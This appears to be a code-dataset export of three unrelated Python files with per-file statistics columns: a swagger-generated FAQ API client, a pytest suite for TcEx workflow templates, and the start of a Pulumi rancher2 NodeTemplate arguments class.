            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_faq_all_using_get" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Every paging/sorting option is optional; only supplied ones are
        # forwarded as query-string parameters.
        query_params = []
        if 'ascending' in params:
            query_params.append(('ascending', params['ascending']))  # noqa: E501
        if 'filter' in params:
            query_params.append(('filter', params['filter']))  # noqa: E501
        if 'order_by' in params:
            query_params.append(('order_by', params['order_by']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'size' in params:
            query_params.append(('size', params['size']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/faq', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageFaq',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_faq_using_get(self, faq_id, **kwargs):  # noqa: E501
        """Retrieve a FAQ  # noqa: E501

        Retrieve the information for a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_faq_using_get(faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str faq_id: UUID faq_id (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise unwrap the data.
        if kwargs.get('async_req'):
            return self.get_faq_using_get_with_http_info(faq_id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_faq_using_get_with_http_info(faq_id, **kwargs)  # noqa: E501
            return data

    def get_faq_using_get_with_http_info(self, faq_id, **kwargs):  # noqa: E501
        """Retrieve a FAQ  # noqa: E501

        Retrieve the information for a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_faq_using_get_with_http_info(faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str faq_id: UUID faq_id (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['faq_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated pattern: validate and flatten kwargs via locals().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_faq_using_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'faq_id' is set
        if ('faq_id' not in params or
                params['faq_id'] is None):
            raise ValueError("Missing the required parameter `faq_id` when calling `get_faq_using_get`")  # noqa: E501

        collection_formats = {}

        # faq_id is substituted into the URL path, not the query string.
        path_params = {}
        if 'faq_id' in params:
            path_params['faq_id'] = params['faq_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/faq/{faq_id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Faq',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update_faq_using_put(self, faq, faq_id, **kwargs):  # noqa: E501
        """Update a FAQ  # noqa: E501

        Update the information for a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_faq_using_put(faq, faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Faq faq: faq (required)
        :param str faq_id: UUID faq_id (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise unwrap the data.
        if kwargs.get('async_req'):
            return self.update_faq_using_put_with_http_info(faq, faq_id, **kwargs)  # noqa: E501
        else:
            (data) = self.update_faq_using_put_with_http_info(faq, faq_id, **kwargs)  # noqa: E501
            return data

    def update_faq_using_put_with_http_info(self, faq, faq_id, **kwargs):  # noqa: E501
        """Update a FAQ  # noqa: E501

        Update the information for a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_faq_using_put_with_http_info(faq, faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Faq faq: faq (required)
        :param str faq_id: UUID faq_id (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['faq', 'faq_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated pattern: validate and flatten kwargs via locals().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_faq_using_put" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'faq' is set
        if ('faq' not in params or
                params['faq'] is None):
            raise ValueError("Missing the required parameter `faq` when calling `update_faq_using_put`")  # noqa: E501
        # verify the required parameter 'faq_id' is set
        if ('faq_id' not in params or
                params['faq_id'] is None):
            raise ValueError("Missing the required parameter `faq_id` when calling `update_faq_using_put`")  # noqa: E501

        collection_formats = {}

        # faq_id is substituted into the URL path; the Faq body is JSON.
        path_params = {}
        if 'faq_id' in params:
            path_params['faq_id'] = params['faq_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'faq' in params:
            body_params = params['faq']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/faq/{faq_id}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Faq',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 37.009294
| 127
| 0.597258
| 2,389
| 19,911
| 4.700293
| 0.069485
| 0.05557
| 0.022531
| 0.03206
| 0.926173
| 0.90765
| 0.889572
| 0.875056
| 0.86241
| 0.846024
| 0
| 0.018055
| 0.31013
| 19,911
| 537
| 128
| 37.078212
| 0.799432
| 0.318317
| 0
| 0.745583
| 1
| 0
| 0.168128
| 0.039176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038869
| false
| 0
| 0.014134
| 0
| 0.109541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c366b39c80d52568abc14768f9ef6b8106a73f81
| 11,732
|
py
|
Python
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 18
|
2017-01-09T22:17:49.000Z
|
2022-01-24T20:46:42.000Z
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 84
|
2017-04-11T13:47:49.000Z
|
2022-03-21T20:12:57.000Z
|
tests/case_management/test_workflow_template_interface.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | 43
|
2017-01-05T20:40:26.000Z
|
2022-03-31T19:18:02.000Z
|
"""Test the TcEx Case Management Module."""
# standard library
import os
# first-party
from tcex.case_management.tql import TQL
from .cm_helpers import CMHelper, TestCaseManagement
class TestWorkflowTemplate(TestCaseManagement):
"""Test TcEx CM Workflow Template Interface."""
def setup_method(self):
    """Configure setup before all tests."""
    # Fresh helper per test keeps workflow_template fixtures isolated;
    # expose its cm/tcex handles for convenience in the test methods.
    self.cm_helper = CMHelper('workflow_template')
    self.cm = self.cm_helper.cm
    self.tcex = self.cm_helper.tcex
def teardown_method(self):
    """Configure teardown before all tests."""
    # Setting the TEARDOWN_METHOD env var (to any value) skips cleanup,
    # e.g. to inspect created data while debugging.
    if os.getenv('TEARDOWN_METHOD') is not None:
        return
    self.cm_helper.cleanup()
def test_workflow_template_api_options(self):
    """Test filter keywords."""
    # Delegates to the shared base-class check of the API's Options output.
    super().obj_api_options()
def test_workflow_template_code_gen(self):
    """Generate code and docstring from Options methods.

    This is not truly a test case, but best place to store it for now.
    """
    generated_doc, generated_filter_map, generated_filter_class = super().obj_code_gen()
    assert generated_doc
    assert generated_filter_map
    assert generated_filter_class
def test_workflow_template_filter_keywords(self):
    """Test filter keywords."""
    # Delegates to the shared base-class filter-keyword check.
    super().obj_filter_keywords()
def test_workflow_template_object_properties(self):
    """Test properties."""
    # Delegates to the shared base-class property check.
    super().obj_properties()
def test_workflow_template_object_properties_extra(self):
    """Test properties."""
    # Delegates to the shared base-class extra-property check.
    super().obj_properties_extra()
def test_workflow_template_create_by_case_id(self, request):
    """Test Workflow Template Creation"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create and persist the workflow template
    template = self.cm.workflow_template(**template_fields)
    template.submit()
    # re-fetch it from the API so the asserts run against server data
    fetched = self.cm.workflow_template(id=template.id)
    fetched.get()
    assert fetched.description == template_fields.get('description')
    assert fetched.name == template_fields.get('name')
    assert fetched.version == template_fields.get('version')
    # remove the fixture
    fetched.delete()
def test_workflow_template_get_many(self, request):
    """Test Workflow Template Creation"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create and persist the workflow template
    template = self.cm.workflow_template(**template_fields)
    template.submit()
    # scan the full listing for the template we just created
    for candidate in self.cm.workflow_templates():
        if candidate.name != template_fields.get('name'):
            continue
        assert template.description == template_fields.get('description')
        assert template.version == template_fields.get('version')
        break
    else:
        assert False, f"Workflow template {template_fields.get('name')} was not found."
    # remove the fixture
    template.delete()
def test_workflow_template_get_single_by_id(self, request):
    """Test Workflow Template Creation"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create and persist the workflow template
    template = self.cm.workflow_template(**template_fields)
    template.submit()
    # fetch it back with every available field populated
    fetched = self.cm.workflow_template(id=template.id)
    fetched.get(all_available_fields=True)
    assert fetched.description == template_fields.get('description')
    assert fetched.name == template_fields.get('name')
    assert fetched.version == template_fields.get('version')
    assert fetched.cases
    # remove the fixture
    fetched.delete()
def test_workflow_template_get_single_by_id_properties(self, request):
    """Test Workflow Template Creation"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # build the template by assigning each property individually rather
    # than via constructor kwargs
    template = self.cm.workflow_template()
    for field_name, field_value in template_fields.items():
        setattr(template, field_name, field_value)
    template.submit()
    # fetch it back with every available field populated
    fetched = self.cm.workflow_template(id=template.id)
    fetched.get(all_available_fields=True)
    assert fetched.description == template_fields.get('description')
    assert fetched.name == template_fields.get('name')
    assert fetched.version == template_fields.get('version')
    assert fetched.cases
    # remove the fixture
    fetched.delete()
def test_workflow_template_get_by_tql_filter_active(self, request):
    """Test Workflow Template Get by TQL"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create and persist the workflow template
    template = self.cm.workflow_template(**template_fields)
    template.submit()
    # query templates whose active flag is False
    templates = self.cm.workflow_templates()
    templates.filter.active(TQL.Operator.EQ, False)
    # templates.filter.id(TQL.Operator.EQ, template.id)
    # more than one workflow event will always be returned
    assert any(
        candidate.name == template_fields.get('name') for candidate in templates
    ), 'No workflow templates returned for TQL'
    # remove the fixture
    template.delete()
def test_workflow_template_get_by_tql_filter_description(self, request):
    """Test Workflow Template Get by TQL"""
    # fields for the template under test
    template_fields = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create and persist the workflow template
    template = self.cm.workflow_template(**template_fields)
    template.submit()
    # query templates by the exact description we just created
    templates = self.cm.workflow_templates()
    templates.filter.description(
        TQL.Operator.EQ, template_fields.get('description')
    )
    # more than one workflow event will always be returned
    assert any(
        candidate.name == template_fields.get('name') for candidate in templates
    ), 'No workflow templates returned for TQL'
    # remove the fixture
    template.delete()
def test_workflow_template_get_by_tql_filter_id(self, request):
    """Test Workflow Template Get by TQL id filter.

    Creates a workflow template, retrieves templates filtered on the
    ``id`` field via TQL, and asserts the created template is among the
    results. The template is always deleted, even on failure.
    """
    # workflow template data (name derives from the running test's name)
    workflow_template_data = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create workflow_template
    workflow_template = self.cm.workflow_template(**workflow_template_data)
    workflow_template.submit()
    try:
        # retrieve workflow templates using TQL
        workflow_templates = self.cm.workflow_templates()
        workflow_templates.filter.id(TQL.Operator.EQ, workflow_template.id)
        # more than one workflow template may be returned; match on name
        assert any(
            wt.name == workflow_template_data.get('name') for wt in workflow_templates
        ), 'No workflow templates returned for TQL'
    finally:
        # cleanup workflow template even when the assertion fails,
        # so a failing test does not leak templates on the server
        workflow_template.delete()
def test_workflow_template_get_by_tql_filter_name(self, request):
    """Test Workflow Template Get by TQL name filter.

    Creates a workflow template, retrieves templates filtered on the
    ``name`` field via TQL, and asserts the created template is among
    the results. The template is always deleted, even on failure.
    """
    # workflow template data (name derives from the running test's name)
    workflow_template_data = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create workflow_template
    workflow_template = self.cm.workflow_template(**workflow_template_data)
    workflow_template.submit()
    try:
        # retrieve workflow templates using TQL
        workflow_templates = self.cm.workflow_templates()
        workflow_templates.filter.name(TQL.Operator.EQ, workflow_template.name)
        # more than one workflow template may be returned; match on name
        assert any(
            wt.name == workflow_template_data.get('name') for wt in workflow_templates
        ), 'No workflow templates returned for TQL'
    finally:
        # cleanup workflow template even when the assertion fails,
        # so a failing test does not leak templates on the server
        workflow_template.delete()
def test_workflow_template_get_by_tql_filter_version(self, request):
    """Test Workflow Template Get by TQL version filter.

    Creates a workflow template, retrieves templates filtered on both
    ``id`` and ``version`` via TQL, and asserts the created template is
    among the results. The template is always deleted, even on failure.
    """
    # workflow template data (name derives from the running test's name)
    workflow_template_data = {
        'description': f'a description for {request.node.name}',
        'name': request.node.name,
        'version': 1,
    }
    # create workflow_template
    workflow_template = self.cm.workflow_template(**workflow_template_data)
    workflow_template.submit()
    try:
        # retrieve workflow templates using TQL
        workflow_templates = self.cm.workflow_templates()
        workflow_templates.filter.id(TQL.Operator.EQ, workflow_template.id)
        workflow_templates.filter.version(
            TQL.Operator.EQ, workflow_template_data.get('version')
        )
        # more than one workflow template may be returned; match on name
        assert any(
            wt.name == workflow_template_data.get('name') for wt in workflow_templates
        ), 'No workflow templates returned for TQL'
    finally:
        # cleanup workflow template even when the assertion fails,
        # so a failing test does not leak templates on the server
        workflow_template.delete()
def test_workflow_template_as_entity(self, request):
"""Test Workflow Template As entity"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
# assert a proper entity is returned
assert workflow_template.as_entity.get('value') == workflow_template_data.get('name')
| 37.967638
| 98
| 0.6582
| 1,298
| 11,732
| 5.715716
| 0.09322
| 0.377409
| 0.142876
| 0.129397
| 0.858741
| 0.836636
| 0.80806
| 0.798356
| 0.778272
| 0.769106
| 0
| 0.001148
| 0.257586
| 11,732
| 308
| 99
| 38.090909
| 0.850631
| 0.191868
| 0
| 0.674157
| 0
| 0
| 0.111385
| 0.003863
| 0
| 0
| 0
| 0
| 0.129213
| 1
| 0.095506
| false
| 0
| 0.016854
| 0
| 0.117978
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c381b953e603199ab5b3cb1f239fe6a3237f2a9d
| 72,015
|
py
|
Python
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-03-23T15:59:11.000Z
|
2021-01-29T00:37:32.000Z
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 76
|
2020-01-16T20:00:25.000Z
|
2022-03-31T20:30:08.000Z
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-03-27T17:39:59.000Z
|
2020-11-24T23:09:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NodeTemplateArgs', 'NodeTemplate']
@pulumi.input_type
class NodeTemplateArgs:
    """The set of input arguments for constructing a NodeTemplate resource.

    Auto-generated by the Pulumi Terraform Bridge (tfgen); every argument is
    optional and is only stored on the instance when explicitly provided.
    """

    def __init__(__self__, *,
                 amazonec2_config: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']] = None,
                 annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 auth_certificate_authority: Optional[pulumi.Input[str]] = None,
                 auth_key: Optional[pulumi.Input[str]] = None,
                 azure_config: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']] = None,
                 cloud_credential_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 digitalocean_config: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']] = None,
                 driver_id: Optional[pulumi.Input[str]] = None,
                 engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 engine_install_url: Optional[pulumi.Input[str]] = None,
                 engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 engine_storage_driver: Optional[pulumi.Input[str]] = None,
                 hetzner_config: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']] = None,
                 labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 linode_config: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 node_taints: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]] = None,
                 opennebula_config: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']] = None,
                 openstack_config: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']] = None,
                 use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
                 vsphere_config: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']] = None):
        """
        The set of arguments for constructing a NodeTemplate resource.
        :param pulumi.Input['NodeTemplateAmazonec2ConfigArgs'] amazonec2_config: AWS config for the Node Template (list maxitems:1)
        :param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
        :param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
        :param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
        :param pulumi.Input['NodeTemplateAzureConfigArgs'] azure_config: Azure config for the Node Template (list maxitems:1)
        :param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
        :param pulumi.Input[str] description: Description for the Node Template (string)
        :param pulumi.Input['NodeTemplateDigitaloceanConfigArgs'] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
        :param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
        :param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
        :param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
        :param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
        :param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
        :param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
        :param pulumi.Input['NodeTemplateHetznerConfigArgs'] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
        :param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
        :param pulumi.Input['NodeTemplateLinodeConfigArgs'] linode_config: Linode config for the Node Template (list maxitems:1)
        :param pulumi.Input[str] name: The name of the Node Template (string)
        :param pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
        :param pulumi.Input['NodeTemplateOpennebulaConfigArgs'] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
        :param pulumi.Input['NodeTemplateOpenstackConfigArgs'] openstack_config: Openstack config for the Node Template (list maxitems:1)
        :param pulumi.Input[bool] use_internal_ip_address: Use internal IP address for the node template (bool)
        :param pulumi.Input['NodeTemplateVsphereConfigArgs'] vsphere_config: vSphere config for the Node Template (list maxitems:1)
        """
        # Store only explicitly-provided (non-None) arguments; pulumi.set
        # records each value under its snake_case key on the input type.
        if amazonec2_config is not None:
            pulumi.set(__self__, "amazonec2_config", amazonec2_config)
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if auth_certificate_authority is not None:
            pulumi.set(__self__, "auth_certificate_authority", auth_certificate_authority)
        if auth_key is not None:
            pulumi.set(__self__, "auth_key", auth_key)
        if azure_config is not None:
            pulumi.set(__self__, "azure_config", azure_config)
        if cloud_credential_id is not None:
            pulumi.set(__self__, "cloud_credential_id", cloud_credential_id)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if digitalocean_config is not None:
            pulumi.set(__self__, "digitalocean_config", digitalocean_config)
        if driver_id is not None:
            pulumi.set(__self__, "driver_id", driver_id)
        if engine_env is not None:
            pulumi.set(__self__, "engine_env", engine_env)
        if engine_insecure_registries is not None:
            pulumi.set(__self__, "engine_insecure_registries", engine_insecure_registries)
        if engine_install_url is not None:
            pulumi.set(__self__, "engine_install_url", engine_install_url)
        if engine_label is not None:
            pulumi.set(__self__, "engine_label", engine_label)
        if engine_opt is not None:
            pulumi.set(__self__, "engine_opt", engine_opt)
        if engine_registry_mirrors is not None:
            pulumi.set(__self__, "engine_registry_mirrors", engine_registry_mirrors)
        if engine_storage_driver is not None:
            pulumi.set(__self__, "engine_storage_driver", engine_storage_driver)
        if hetzner_config is not None:
            pulumi.set(__self__, "hetzner_config", hetzner_config)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if linode_config is not None:
            pulumi.set(__self__, "linode_config", linode_config)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if node_taints is not None:
            pulumi.set(__self__, "node_taints", node_taints)
        if opennebula_config is not None:
            pulumi.set(__self__, "opennebula_config", opennebula_config)
        if openstack_config is not None:
            pulumi.set(__self__, "openstack_config", openstack_config)
        if use_internal_ip_address is not None:
            pulumi.set(__self__, "use_internal_ip_address", use_internal_ip_address)
        if vsphere_config is not None:
            pulumi.set(__self__, "vsphere_config", vsphere_config)

    # Each snake_case property below maps to the camelCase key used by the
    # Rancher2 provider (via the @pulumi.getter name= argument).
    @property
    @pulumi.getter(name="amazonec2Config")
    def amazonec2_config(self) -> Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]:
        """
        AWS config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "amazonec2_config")

    @amazonec2_config.setter
    def amazonec2_config(self, value: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]):
        pulumi.set(self, "amazonec2_config", value)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Annotations for Node Template object (map)
        """
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter(name="authCertificateAuthority")
    def auth_certificate_authority(self) -> Optional[pulumi.Input[str]]:
        """
        Auth certificate authority for the Node Template (string)
        """
        return pulumi.get(self, "auth_certificate_authority")

    @auth_certificate_authority.setter
    def auth_certificate_authority(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "auth_certificate_authority", value)

    @property
    @pulumi.getter(name="authKey")
    def auth_key(self) -> Optional[pulumi.Input[str]]:
        """
        Auth key for the Node Template (string)
        """
        return pulumi.get(self, "auth_key")

    @auth_key.setter
    def auth_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "auth_key", value)

    @property
    @pulumi.getter(name="azureConfig")
    def azure_config(self) -> Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]:
        """
        Azure config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "azure_config")

    @azure_config.setter
    def azure_config(self, value: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]):
        pulumi.set(self, "azure_config", value)

    @property
    @pulumi.getter(name="cloudCredentialId")
    def cloud_credential_id(self) -> Optional[pulumi.Input[str]]:
        """
        Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
        """
        return pulumi.get(self, "cloud_credential_id")

    @cloud_credential_id.setter
    def cloud_credential_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cloud_credential_id", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description for the Node Template (string)
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="digitaloceanConfig")
    def digitalocean_config(self) -> Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]:
        """
        Digitalocean config for the Node Template (list maxitems:1)
        """
        return pulumi.get(self, "digitalocean_config")

    @digitalocean_config.setter
    def digitalocean_config(self, value: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]):
        pulumi.set(self, "digitalocean_config", value)

    @property
    @pulumi.getter(name="driverId")
    def driver_id(self) -> Optional[pulumi.Input[str]]:
        """
        The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
        """
        return pulumi.get(self, "driver_id")

    @driver_id.setter
    def driver_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "driver_id", value)

    @property
    @pulumi.getter(name="engineEnv")
    def engine_env(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Engine environment for the node template (string)
        """
        return pulumi.get(self, "engine_env")

    @engine_env.setter
    def engine_env(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "engine_env", value)

    @property
    @pulumi.getter(name="engineInsecureRegistries")
    def engine_insecure_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Insecure registry for the node template (list)
        """
        return pulumi.get(self, "engine_insecure_registries")

    @engine_insecure_registries.setter
    def engine_insecure_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "engine_insecure_registries", value)

    @property
    @pulumi.getter(name="engineInstallUrl")
    def engine_install_url(self) -> Optional[pulumi.Input[str]]:
        """
        Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
        """
        return pulumi.get(self, "engine_install_url")

    @engine_install_url.setter
    def engine_install_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine_install_url", value)

    @property
    @pulumi.getter(name="engineLabel")
    def engine_label(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Engine label for the node template (string)
        """
        return pulumi.get(self, "engine_label")

    @engine_label.setter
    def engine_label(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
